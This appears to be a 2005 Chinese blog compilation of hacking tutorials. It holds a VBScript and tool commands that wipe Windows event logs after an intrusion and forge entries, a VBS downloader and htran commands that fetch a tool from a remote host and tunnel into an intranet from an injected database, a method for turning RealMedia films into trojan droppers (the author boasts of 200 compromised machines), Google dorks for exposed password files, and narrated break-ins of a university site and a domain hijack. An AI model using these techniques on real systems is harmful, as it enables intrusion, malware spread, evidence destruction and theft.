2005年07月14日
windows日志的保护与伪造    

作者:netone (netonego_at_ccermail.net)

windows日志的保护与伪造
日志对于系统安全的作用是显而易见的,无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客往往会在入侵成功后迅速清除掉对自己不利的日志。下面我们就来讨论一下日志的安全和创建问题。
一:概述:Windows2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\system32\config,默认文件大小512KB。
安全日志文件:%systemroot%\system32\config\SecEvent.EVT
系统日志文件:%systemroot%\system32\config\SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog
有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。


二:作为网络管理员:
1。日志的安全配置:
默认的条件下,日志的大小为512KB大小,如果超出则会报错,并且不会再记录任何日志。所以首要任务是更改默认大小,具体方法:注册表中HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog对应的每个日志如系统,安全,应用程序等均有一个maxsize子键,修改即可。
下面给出一个来自微软站点的一个脚本,利用VMI来设定日志最大25MB,并允许日志自行覆盖14天前的日志:
该脚本利用的是WMI对象, WMI(Windows Management Instrumentation)技术是微软提供的Windows下的系统管理工具。通过该工具可以在本地或者管理客户端系统中几乎一切的信息。很多专业的网络管理工具都是基于WMI开发的。该工具在Win2000以及WinNT下是标准工具,在Win9X下是扩展安装选项。所以以下的代码在2000以上均可运行成功。

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Security)}!\\" & _
strComputer & "\root\cimv2") ‘获得VMI对象
Set colLogFiles = objWMIService.ExecQuery _
("select * from Win32_NTEventLogFile")
For each objLogfile in colLogFiles
strLogFileName = objLogfile.Name
Set wmiSWbemObject = GetObject _
("winmgmts:{impersonationLevel=Impersonate}!\\.\root\cimv2:" _
& "Win32_NTEventlogFile.Name=’" & strLogFileName & "’")
wmiSWbemObject.MaxFileSize = 2500000000
wmiSWbemObject.OverwriteOutdated = 14
wmiSWbemObject.Put_
Next
将上述脚本用记事本存盘为vbs为后缀的即可使用。
另外需要说明的是代码中的strComputer="."在windows脚本中的含义相当于localhost,如果要在远程主机上执行代码,只需要把"."改动为主机名,当然首先得拥有对方主机的管理员权限并建立IPC连接.本文中的代码所出现的strComputer均可作如此改动.
2。日志的查询与备份:
一个优秀的管理员是应该养成备份日志的习惯,如果有条件的话还应该把日志转存到备份机器上或直接转储到打印机上,笔者还有一篇文章《利用脚本编程格式化输出系统日志》,详细的讲述了利用windows脚本把日志转储并输出成html页已便于查询,有兴趣的可以查看,在这里推荐微软的resourceKit工具箱中的dumpel.exe,他的常用方法:
dumpel -f filename -s \\server -l log
-f filename 输出日志的位置和文件名
-s \\server 输出远程计算机日志
-l log log 可选的为system,security,application,可能还有别的如DNS等
如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式:
dumpel \\server -l system -f backupsystem.log
再利用计划任务可以实现定期备份系统日志。
另外利用脚本编程的VMI对象也可以轻而易举的实现日志备份:
下面给出备份application日志的代码:
backuplog.vbs
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2") ‘获得 VMI对象
Set colLogFiles = objWMIService.ExecQuery _
("select * from Win32_NTEventLogFile where LogFileName=’Application’") ‘获取日志对象中的应用程序日志
For Each objLogfile in colLogFiles
errBackupLog = objLogFile.BackupEventLog("f:\application.evt") ‘将日志备份为f:\application.evt
If errBackupLog <> 0 Then
Wscript.Echo "The Application event log could not be backed up."
else Wscript.Echo "success backup log"
End If
Next
程序说明:如果备份成功将窗口提示:"success backup log" 否则提示:"The Application event log could not be backed up",此处备份的日志为application 备份位置为f:\application.evt,可以自行修改,此处备份的格式为evt的原始格式,用记事本打开则为乱码,这一点他不如dumpel用得方便。


三:作为黑客
1。日至清除
一个入侵系统成功后的黑客第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在m命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,下面介绍几种方法:
1.借助第三方工具:如小榕的elsave.exe远程清除system,applicaton,security的软件,使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user
然后命令行下:elsave -s \\ip -l application -C,这样就删除了安全日志。
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
2.利用脚本编程中的VMI,也可以实现删除日志,首先获得object对象,然后利用其clearEventLog() 方法删除日志。源代码:
cleanevent.vbs
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
("select * from Win32_NTEventLogFile where LogFileName=’"&logs&"’")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next
在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。
然后用一个for 循环,删除数组中的每一个元素,即各个日志.
2。创建日志:
删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何
伪造日志:
1。利用脚本编程中的eventlog方法是创造日志变得非常简单;下面看一个代码
createlog.vbs
set ws=wscript.createobject("Wscript.shell")
ws.logevent 0 ,"write log success" ‘创建一个成功执行日志
这个代码很容易阅读,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法
logevent的用法:logevent eventtype,"description" [,remote system]
eventtype 为日志类型,可以使用的如下:0 代表成功执行,1 执行出错 ,2 警告 , 4,信息 ,8 成功审计 16 故障审计
所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。
这种方法写的日志有一个缺点,只能写到应用程序日志,而且日至来源只能为wsh,即windows scripting host,所以不能起太多的隐蔽作用。
2,微软为了方便系统管理员和程序员,在xp下有个新的命令行工具,eventcreate.exe,利用它,创建日志更加简单。
eventcreate -s server -l logname -u username -p password -so source -t eventtype -id id -d description
含义:-s 为远程主机创建日志: -u 远程主机的用户名 -p 远程主机的用户密码
-l 日志;可以创建system和application 不能创建security日志,
-so 日志来源,可以是任何日志 -t 日志类型 如information信息,error错误,warning 警告,
-d 日志描述,可以是任意语句 -id 自主日志为1-1000之内
例如,我们要本地创建一个系统日志,日至来源为admin,日志类型是警告,描述为"this is a test",事件ID为500
可以用如下参数
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500
这个工具不能创建安全日志。至于如何创建安全日志,希望大家能够找到一个好方法!
2005年06月18日

妙用代理渗透内网


文章作者:LiNzi [BCT&混客联盟](chinaskyv@163.com
信息来源:邪恶八进制信息安全团队

正文
代理在入侵里的作用—–妙用代理,渗透内网
一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
  1.给内网目标机装个代理服务器
  2.把弄好的那个代理端口映到公网.
  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
  4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
  1.公网肉鸡一只:218.3.1.1
  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
  4.A:192.168.1.2   B:218.3.1.1 C:www.baidu.com D:192.168.0.25
四、入侵进行时
  1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe
  2.安装Socks5服务
在nbsi下执行:
htran.exe -install   //安装Socks5服务
htran.exe -start   //启动Socks5服务
  3.反弹进行时
在B上运行:   htran.exe -s -listen 520 5200   //监听端口
在nbsi下执行:htran.exe -s -connect 218.3.1.1 520
  3.进入内网
现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。
五、渗透内网
  接下来就可以扫描,嗅探,等等,也就是后话了。
六、总结
  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。

偶的朋友可以在我的QQ硬盘里面下载动画。在我的个人文章里面。

并不神奇的Real影片木马


文章作者:intruder
信息来源:邪恶八进制 中国

如转载请注明出处

  在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。

  使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
  新建一个文本文件rmevents.txt.
  输入:
u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html
  我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。
  输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。

  http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马都可以。主要是新,威力强。

  大家可以试一下。呵呵,intruder原创。本文允许转载,如转载请注明出处,谢谢。


  唉。看来公布这个的危害还是不小地,嘿嘿,就当替我们党打击色情业了。

  防御方法:一,最重要的一点,嘿嘿,别看不健康的东西,对身体不好哦。二,换别的播放器,我推荐梦幻鼎点播放器,贼好用啊。三,看片时用防火墙屏蔽RealPlayer对网络的访问,但这样做在线看的时候就没保险了。四,最最重要的一点,打完所有的IE补丁。五,如果不怕麻烦,在看影片之前我们可以执行我们做木马的那一步,只是把rmevents.txt的内容清空再做,这样就清空了影片的剪辑信息了。

  就这么点东西。文字里我老是嘿嘿呵呵的,别当我有精神病就行

2005年05月24日

google hacking的实现以及应用
by sniper

google hacking的实现以及应用(上)

前言
    google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单…

google hacking的简单实现
    记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.

intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似.

cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.

define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.

filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)

info:
查找指定站点的一些基本信息.

inurl:
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin,用来找管理员登陆的URL不错.allinurl也同inurl类似,可指定多个字符.

link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.

site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.


    对了还有一些操作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
""    精确查询

    下面开始说说实际应用(我个人还是比较习惯用google.com,以下内容均在google上搜索),对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的.下面是我找到的一个FreeBSD系统的passwd文件(我已做过处理):
图一


    同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,我们可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
图二


    还记得http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32
图三

   
    前面我们已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data  //在一些配置不正确的apache+win32的服务器上经常出现这种情况
    和上面的原理一样,我们还可以用google来找后台,方法就略了,举一反三即可,毕竟我写这篇文章的目的是让大家了解google hacking,而不是让你用google去破坏.安全是把双刃剑,关键在于你如何去运用.

                                    google hacking的实现以及应用(下)

本文作者:sniper
文章出于:www.4ngel.net
日  期 : 05/01/26
本文仅做于技术讨论于研究,请勿用做其他用途.
本文的上半部分可在4ngel.net找到.

    利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.xxxx.com是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:).
    首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
    从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
    顺便ping了一下,应该是在不同的服务器.(想想我们学校就那一台可怜的web服务器,大学就是有钱,汗一个)。学校一般都会有不少好的资料,先看看有什么好东西没:
site:xxxx.com filetype:doc
得到N个不错的doc。先找找网站的管理后台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:…….
……
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛
a3服务器也是IIS,aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,back a shell我不太喜欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名+电话一类的变形,用google搞定吧。
site:xxxx.com    //得到N个二级域名
site:xxxx.com intext:*@xxxx.com  //得到N个邮件地址,还有邮箱的主人的名字什么的
site:xxxx.com intext:电话     //N个电话
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:
name:网站管理员
pass:a2xxxx7619    //说了吧,就是域名+4个数字
要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。

关于google hacking的防范:
    以前我们站的晓风·残月写过一篇躲避google的文章,原理就是通过在站点根目录下建立一个robots.txt以避免网络机器人获得一些敏感的信息,具体大家看原文章:http://www.4ngel.net/article/26.htm
    不过这种方法我个人不推荐,有点此地无银三百两的味道。简单一点的方法就是上google把自己站点的一些信息删除掉,访问这个URL:
http://www.google.com/remove.html
前几天看见又有人讨论用程序来欺骗robot的方法,我觉得可以试试:
代码如下:
<?php

if (strstr($_SERVER['HTTP_USER_AGENT'], "Googlebot"))
{
header("HTTP/1.1 301");
header("Location: http://www.google.com");
}

?>

asp的:
<%
if instr(Request.Servervariables("HTTP_USER_AGENT"),"Googlebot") then
  response.redirect("http://www.google.com")
end if
 
%>


后记
    这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面,一个intitle:index of就差不多都出来了:)

2005年05月21日

近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击, 但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法, 攻击者使用的是一种域名劫持攻击际?攻击者通过冒充原域名拥有者以E-MAIL方式修改网络解决方案公司的注册域名记录,将域名转让到另一团体,通过在修改后注册信息所指定的DNS服务器加进该域名记录,让原域名指向另一IP的服务器,通常那两台服务器都是攻击者预先入侵控制的服务器,并不归攻击者所拥有.

那攻击者到底是怎样实施该域名劫持攻击的呢?

1.获得要劫持的域名注册信息

攻击者会先访问网络解决方案公司www.networksolutions.com,通过该公司主页面所提供的MAKE CHANGES功能,输入要查询的域名,获得该域名注册信息以abc.com为例,我们将获得以下信息:
Registrant:
Capital Cities/ABC,Inc (ABC10-DOM)
77 W 66th St.
New York, NY 10023
US

Domain Name: ABC.COM

Administrative Contact, Billing Contact:
King, Thomas C. (SC3123-ORG) abc.legal.internet.registration@ABC.COM
ABC, Inc.
77 W 66th St.
New York, NY 10023
US
212-456-7012
Technical Contact, Zone Contact:
Domain Administrator (DA4894-ORG) dns-admin@STARWAVE.COM
Starwave Corporation
13810 SE Eastgate Way, ste. 400
Bellevue, WA 98005
US
206.664.4800
Fax- 206.664.4829

Record last updated on 11-Oct-2000.
Record expires on 23-May-2003.
Record created on 22-May-1996.
Database last updated on 20-Oct-2000 14:14:26 EDT.

Domain servers in listed order:

DNS1.STARWAVE.COM 204.202.132.51
T.NS.VERIO.NET 192.67.14.16


2.控制该管理域名的E-MAIL帐号

从上面获得的信息,攻击者可了解到abc.com的注册DNS服务器,管理域名的E-MAIL帐号,技术联系E-MAIL帐号等等注册资料,攻击者的重点就是先需要把该管理域名的E-MAIL帐号abc.legal.internet.registration@ABC.COM控制,进行收发在网络解决方案公司networksolutions主页所修改域名注册记录后的确认E-MAIL,对该E-MAIL帐号的控制过程不排除攻击者对该E-MAIL帐号进行密码暴力猜测,对该帐号所在E-MAIL服务器进行入侵攻击.


3.修改该域名在网络解决方案公司的注册信息

到这个时候,攻击者会使用网络解决方案公司networksolutions的MAKE CHANGES功能修改该域名的注册信息,包括拥有者信息,DNS服务器信息,等等.


4.冒充拥有者使用管理域名的E-MAIL帐号收发网络解决方案公司确认函

攻击者会在该管理域名E-MAIL帐号的真正拥有者收到网络解决方案公司确认函之前, 把该E-MAIL帐号的信件接收,使用该E-MAIL帐号回复网络解决方案公司进行确认,进行二次回复确认后,将收到网络解决方案公司发来的成功修改注册记录函,攻击者成功劫持域名


5.在新指定的DNS服务器加进该域名记录

在注册信息新指定DNS服务器里加进该域名的PTR记录,指向另一IP的服务器,通常那两台服务器都是攻击者预先入侵控制的服务器,并不归攻击者所拥有.